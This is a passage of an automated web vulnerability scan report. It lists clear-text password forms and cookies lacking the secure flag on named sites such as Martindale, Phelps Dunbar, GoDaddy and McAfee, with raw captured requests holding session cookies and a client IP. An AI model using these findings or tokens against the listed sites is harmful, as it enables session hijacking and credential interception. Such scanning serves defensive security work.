Path:   /all/c-england/all-lawyers-9.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers-9.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers-9.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:47 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954467277737&InitialSearchId=201104160954467277737; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:46 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90518
Connection: close
X-RE-Ref: 1 -2143675582
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers-9.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.66. http://www.martindale.com/all/c-england/all-lawyers.htm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   /all/c-england/all-lawyers.htm
The form contains the following password field:
   ctl06$ucLogin$txtFlyOutPassword

Request

GET /all/c-england/all-lawyers.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 13:54:49 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104160954497277746&InitialSearchId=201104160954497277746; domain=.martindale.com; expires=Sat, 16-Apr-2011 14:49:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 94106
Connection: close
X-RE-Ref: 1 -2142132339
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<!-- end form -->
<form name="Form1" method="post" action="/all/c-england/all-lawyers.htm" id="Form1">
<div>
...[SNIP]...
<div class="p-t-2">
<input name="ctl06$ucLogin$txtFlyOutPassword" type="password" maxlength="20" id="ctl06_ucLogin_txtFlyOutPassword" class="w-205" /></div>
...[SNIP]...

7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html
The form contains the following password field:
   pass

Request

GET /firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:13:13 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 13601

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input type="password" id="pass" name="pass" value="" class="newloginbox-input" />&nbsp;
               <input type="image" name="submit" width="0" >
...[SNIP]...

7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html
The form contains the following password field:
   pass

Request

GET /firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=27854845.703389798.1302905835.1302905835.1302911975.2; fe_typo_user=812d0e9a14

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:11:39 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 14539

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input type="password" id="pass" name="pass" value="" class="newloginbox-input" />&nbsp;
               <input type="image" name="submit" width="0" >
...[SNIP]...

7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   my-library-log-in/my-library/new-user.html
The form contains the following password fields:
   FE[fe_users][password]
   FE[fe_users][password_again]

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:11:50 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 28693

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
<div class="tx-srfeuserregister-pi1">
       
<form name="fe_users_form" method="post" action="my-library-log-in/my-library/new-user.html" enctype="multipart/form-data" >
<table border="0" cellspacing="0" cellpadding="1">
...[SNIP]...
<p><input type="password" name="FE[fe_users][password]" size="10" /> Repeat: <input type="password" name="FE[fe_users][password_again]" size="10" /></p>
...[SNIP]...

7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /pages/register_newsletters/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
   newsletterssubscribe.html
The form contains the following password field:
   pass

Request

GET /pages/register_newsletters/index.html HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
Referer: http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:12:01 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
Last-Modified: Thu, 15 Jul 2010 21:03:07 GMT
ETag: "316062f-6ab0-4c3f778b"
Accept-Ranges: bytes
Content-Length: 27312
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>

   <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

<!--
   This website is powered by TYPO3 -
...[SNIP]...
<div class="tx-newloginbox-pi1">
       

<form action="newsletterssubscribe.html" target="_top" method="post" onSubmit="" id="loginForm">
   <table>
...[SNIP]...
<br>
               <input id="pass" name="pass" value="" class="newloginbox-input" type="password">&nbsp;
               <input name="submit" type="image" width="0">
...[SNIP]...

8. SSL cookie without secure flag set
There are 20 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.


8.1. https://auctions.godaddy.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253878
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hylauhnwszd2e555krb3dw55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...

8.2. https://cc.dealer.com/views/login

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /views/login?loginFailed=true&reseller=3&lang=http://example.com/? HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Location: http://cc.dealer.com/views/error?errorId=20110417-6124c901404638bf01d3e3f32d3febab
Content-Length: 0
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:48:11 GMT
Connection: keep-alive
Set-Cookie: ssoid=6124c8ff404638bf01d3e3f3d1ff707a;path=/;domain=.dealer.com
Set-Cookie: JSESSIONID=53tc30bjqdllv;path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT


8.3. https://community.qualys.com/docs/DOC-1542

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://community.qualys.com
Path:   /docs/DOC-1542

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /docs/DOC-1542 HTTP/1.1
Host: community.qualys.com
Connection: keep-alive
Referer: https://browsercheck.qualys.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserCookie=172.16.1.14.146041303044897733; __utmz=64045999.1303044904.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64045999.1579957593.1303044904.1303044904.1303044904.1; __utmc=64045999; __utmb=64045999.2.10.1303044904; _jsuid=9968629672415245526; __ytrksn=8QU1PX4T5CFN332MTYVW; __ytrkid=TH2NMH8440GCXGY6L9XQ

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:59:56 GMT
Server: Apache-Coyote/1.1
X-JAL: 133
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.server.info="serverName=community.qualys.com:serverPort=443:contextPath=:localName=qualys-inc-external-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; Version=1; Path=/
Set-Cookie: JSESSIONID=288BC31E084BC039114BDA47E027F3E4.; Path=/
Set-Cookie: jive.recentHistory.-1=3130322c313534323b; Expires=Tue, 17-May-2011 12:59:56 GMT; Path=/
Vary: Accept-Encoding,User-Agent
X-JSL: D=155817 t=1303045196476096
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServerPool_VM030=3892738058.20480.0000; path=/
Content-Length: 108829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://email.phelps.com
Path:   /exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /exchweb/bin/auth/owaauth.dll HTTP/1.1
Host: email.phelps.com
Connection: keep-alive
Referer: https://email.phelps.com/exchweb/bin/auth/owalogon.asp?url=https://email.phelps.com/exchange&reason=0&replaceCurrent=1
Cache-Control: max-age=0
Origin: https://email.phelps.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 117

destination=https%3A%2F%2Femail.phelps.com%2Fexchange&flags=0&forcedownlevel=0&trusted=0&username=&password=&isUtf8=1

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://email.phelps.com/exchange
Server: Microsoft-IIS/7.0
Set-Cookie: sessionid=51f31231-e086-4093-b79d-88f46ebaa64c; path=/
Set-Cookie: cadata="0JYNAs7OHr9rX0/8d5d4eJnG1FqR4YAWGicAHaA=="; HttpOnly; secure; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 14:14:41 GMT


8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /WebServices/AccountWebSvc.asmx/js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WebServices/AccountWebSvc.asmx/js HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: https://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionInfo=AffiliateId=0; isvt_visitor=yNo98QoBC2cAABJDQT4AAAAAAB1JCVeen0VKRW; WT_FPC=id=20dc5aca13b81baa15d1303034109486:lv=1303034109486:ss=1303034109486; s_cc=true; s_vi=[CS]v1|26D5719A051D00E9-600001368029DFAB[CE]; IS3_History=1302573891-1-74_3--1__3_; IS3_GSV=DPL-2_TES-1303044907_PCT-1303044907_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; s_nr=1303045175869-New; s_ev8=%5B%5B%27mcafee%27%2C%271303045175870%27%5D%5D; s_sq=mcafeecomglobal%3D%2526pid%253Dconsumer%25253Aen-us%25253Adirect-0-mcafee%25253Afree_services%25253Afreescan_scan_initiated%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253Alocation.href%25253D%252522http%25253A//promos.mcafee.com/offer.aspx%25253Fid%25253D285986%252522%25253Bretu%2526oidt%253D2%2526ot%253DSUBMIT; FSRCookie=isAlive=0||ForeseeLoyalty=1||previousURL=http%253A//home.mcafee.com/downloads/free-virus-scan; session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/secure/cart/?offerId=285986&PkgQty=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=7eb93d4df8d699b83f918264443cd1115c4a4c55590b0215&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; IscartemptySiteidAffid=no-1-0; currentURL=https%3A//home.mcafee.com/secure/cart/%3FofferId%3D285986%26PkgQty%3D1; foresee.alive=1303045190597

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript; charset=utf-8
Expires: Wed, 14 Apr 2010 12:06:21 GMT
Last-Modified: Thu, 14 Apr 2011 12:06:21 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e0%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e0%3c%2fwt_destination_cid%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 17-Apr-2041 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=122d9a9e-74f4-4d0e-85cf-3ecd0f120b8e&loc=EN-US; domain=mcafee.com; expires=Sat, 17-Apr-2021 12:59:53 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f%3fofferId%3d285986%26PkgQty%3d1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=7eb93d4df8d699b83f918264443cd1115c4a4c55590b0215&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV9
X-UA-Compatible: IE=8
Date: Sun, 17 Apr 2011 12:59:53 GMT
Content-Length: 4551

Type.registerNamespace('McAfee.WebServices');
McAfee.WebServices.AccountWebSvc=function() {
McAfee.WebServices.AccountWebSvc.initializeBase(this);
this._timeout = 0;
this._userContext = null;
thi
...[SNIP]...

8.6. https://home.mcafee.com/secure/cart/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://home.mcafee.com
Path:   /secure/cart/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/cart/?offerId=285986&PkgQty=1 HTTP/1.1
Host: home.mcafee.com
Connection: keep-alive
Referer: http://promos.mcafee.com/offer.aspx?id=285986
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
